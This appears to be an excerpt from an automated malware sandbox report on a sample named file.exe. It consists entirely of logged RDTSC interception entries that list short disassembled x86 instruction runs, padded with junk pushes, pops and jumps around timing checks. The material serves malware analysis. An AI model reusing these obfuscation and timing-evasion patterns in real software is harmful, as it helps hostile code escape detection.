          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201C4 second address: 4C201CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201CA second address: 4C201F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F174075FE7Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C201F1 second address: 4C20200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20200 second address: 4C20207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20207 second address: 4C2027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F17414E3407h 0x0000000d nop 0x0000000e jmp 00007F17414E3406h 0x00000013 sub esp, 18h 0x00000016 jmp 00007F17414E3400h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F17414E33FEh 0x00000023 xor eax, 40381178h 0x00000029 jmp 00007F17414E33FBh 0x0000002e popfd 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2027E second address: 4C20284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20284 second address: 4C20305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3406h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F17414E3400h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edi 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov ecx, ebx 0x0000001c pop edx 0x0000001d mov bx, si 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 call 00007F17414E33FEh 0x00000028 mov ebx, esi 0x0000002a pop ecx 0x0000002b push ebx 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f pushad 0x00000030 call 00007F17414E3402h 0x00000035 push ecx 0x00000036 pop edi 0x00000037 pop eax 0x00000038 pushad 0x00000039 mov dx, 9E40h 0x0000003d mov edx, 65E45E6Ch 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov cx, bx 0x0000004b mov cx, dx 0x0000004e popad 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20305 second address: 4C2030B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2030B second address: 4C2034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F17414E3400h 0x00000011 mov eax, dword ptr [769B4538h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17414E3407h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2034E second address: 4C2041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F174075FE7Eh 0x00000011 xor eax, ebp 0x00000013 jmp 00007F174075FE81h 0x00000018 nop 0x00000019 jmp 00007F174075FE7Eh 0x0000001e push eax 0x0000001f jmp 00007F174075FE7Bh 0x00000024 nop 0x00000025 jmp 00007F174075FE86h 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d pushad 0x0000002e pushad 0x0000002f mov al, 0Dh 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 jmp 00007F174075FE7Fh 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 jmp 00007F174075FE86h 0x00000045 mov dword ptr [ebp-18h], esp 0x00000048 pushad 0x00000049 mov ax, CB0Dh 0x0000004d mov cx, 0B09h 0x00000051 popad 0x00000052 mov eax, dword ptr fs:[00000018h] 0x00000058 pushad 0x00000059 mov al, bl 0x0000005b popad 0x0000005c mov ecx, dword ptr [eax+00000FDCh] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2041A second address: 4C2041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2041E second address: 4C20422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20422 second address: 4C20428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20428 second address: 4C2045B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, EFA0h 0x00000012 jmp 00007F174075FE89h 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2045B second address: 4C20485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F17414E3445h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17414E33FDh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20485 second address: 4C2048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2048B second address: 4C204F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17414E3405h 0x00000011 and esi, 275A8966h 0x00000017 jmp 00007F17414E3401h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ecx, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 jmp 00007F17414E3403h 0x00000027 mov dx, cx 0x0000002a popad 0x0000002b test ecx, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F17414E33FCh 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C204F2 second address: 4C20501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20501 second address: 4C20519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3404h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C101CE second address: 4C101E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE84h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C101E6 second address: 4C1020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3408h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1020B second address: 4C1021A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1021A second address: 4C1027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17414E33FFh 0x00000009 xor ax, 04AEh 0x0000000e jmp 00007F17414E3409h 0x00000013 popfd 0x00000014 call 00007F17414E3400h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F17414E3401h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov dx, 0F6Eh 0x0000002c mov ecx, edi 0x0000002e popad 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1027E second address: 4C102DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE7Eh 0x00000009 sbb ax, 1BB8h 0x0000000e jmp 00007F174075FE7Bh 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d pushad 0x0000001e mov esi, edx 0x00000020 jmp 00007F174075FE7Dh 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F174075FE7Eh 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F174075FE7Eh 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102DB second address: 4C10302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17414E3405h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10302 second address: 4C10307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10307 second address: 4C1030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1030D second address: 4C1031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1031B second address: 4C1031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1031F second address: 4C10325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1038E second address: 4C103CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushfd 0x00000007 jmp 00007F17414E3405h 0x0000000c adc ax, 6E96h 0x00000011 jmp 00007F17414E3401h 0x00000016 popfd 0x00000017 popad 0x00000018 popad 0x00000019 inc ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103CA second address: 4C103CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103CE second address: 4C103D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1048F second address: 4C10493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10493 second address: 4C10499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10527 second address: 4C1052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1052B second address: 4C10571 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a jmp 00007F17414E33FFh 0x0000000f jg 00007F17B323133Eh 0x00000015 jmp 00007F17414E3406h 0x0000001a js 00007F17414E3467h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bx, 8C90h 0x00000027 movsx edx, si 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10571 second address: 4C10583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Eh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10583 second address: 4C105C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b jmp 00007F17414E3407h 0x00000010 jne 00007F17B32312ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17414E3405h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C105C2 second address: 4C10614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F174075FE83h 0x00000015 add esi, 1F0A365Eh 0x0000001b jmp 00007F174075FE89h 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10614 second address: 4C1061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1061A second address: 4C1061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1061E second address: 4C1063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17414E3400h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1063B second address: 4C1069E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE81h 0x00000009 or ch, FFFFFFF6h 0x0000000c jmp 00007F174075FE81h 0x00000011 popfd 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edx, 3DF68F18h 0x00000021 pushfd 0x00000022 jmp 00007F174075FE81h 0x00000027 or si, 2206h 0x0000002c jmp 00007F174075FE81h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1069E second address: 4C106C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17414E33FDh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106C5 second address: 4C106CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106CB second address: 4C106CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106CF second address: 4C106F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov esi, 14DD3A9Bh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C106F2 second address: 4C1073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F17414E3403h 0x0000000c nop 0x0000000d jmp 00007F17414E3406h 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F17414E3400h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1073B second address: 4C1073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1073F second address: 4C1075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3408h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C107AC second address: 4C10019 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F174075FE88h 0x00000008 adc ch, 00000078h 0x0000000b jmp 00007F174075FE7Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 je 00007F17B24ADCEFh 0x0000001d xor eax, eax 0x0000001f jmp 00007F17407395AAh 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop ebx 0x00000027 leave 0x00000028 retn 0004h 0x0000002b nop 0x0000002c sub esp, 04h 0x0000002f mov esi, eax 0x00000031 cmp esi, 00000000h 0x00000034 setne al 0x00000037 xor ebx, ebx 0x00000039 test al, 01h 0x0000003b jne 00007F174075FE77h 0x0000003d jmp 00007F174075FF7Fh 0x00000042 call 00007F17449DB895h 0x00000047 mov edi, edi 0x00000049 pushad 0x0000004a mov cx, 6AEDh 0x0000004e jmp 00007F174075FE7Ah 0x00000053 popad 0x00000054 xchg eax, ebp 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10019 second address: 4C1001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1001D second address: 4C10021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10021 second address: 4C10027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10027 second address: 4C10050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE82h 0x00000009 sbb cx, 3CE8h 0x0000000e jmp 00007F174075FE7Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10050 second address: 4C1006C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e call 00007F17414E33FCh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1006C second address: 4C1008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F174075FE7Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1008F second address: 4C1009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1009E second address: 4C100B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE84h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C100B6 second address: 4C100F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F17414E3406h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17414E3407h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C100F9 second address: 4C10125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F174075FE7Ch 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10125 second address: 4C1012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1012B second address: 4C1012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1012F second address: 4C1015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E33FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17414E3408h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1015F second address: 4C10163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10163 second address: 4C10169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10BBA second address: 4C10C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F174075FE87h 0x00000009 or ah, FFFFFFFEh 0x0000000c jmp 00007F174075FE89h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F174075FE80h 0x00000018 xor si, 4EF8h 0x0000001d jmp 00007F174075FE7Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ebp, esp 0x00000028 jmp 00007F174075FE86h 0x0000002d cmp dword ptr [769B459Ch], 05h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov edx, 62274B70h 0x0000003c pushfd 0x0000003d jmp 00007F174075FE89h 0x00000042 adc cx, 7CF6h 0x00000047 jmp 00007F174075FE81h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C70 second address: 4C10C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E33FCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C80 second address: 4C10C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F17B249DBEDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ch, 91h 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C97 second address: 4C10C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10C9D second address: 4C10CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10CA1 second address: 4C10CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10CA5 second address: 4C10CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F174075FE7Bh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10DAB second address: 4C10DFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F17B3216FB3h 0x0000000f jmp 00007F17414E33FEh 0x00000014 cmp dword ptr [ebp+08h], 00002000h 0x0000001b pushad 0x0000001c call 00007F17414E33FEh 0x00000021 mov di, cx 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 movsx edx, cx 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10DFB second address: 4C10DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C20925 second address: 4C2093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3403h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2093C second address: 4C20940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
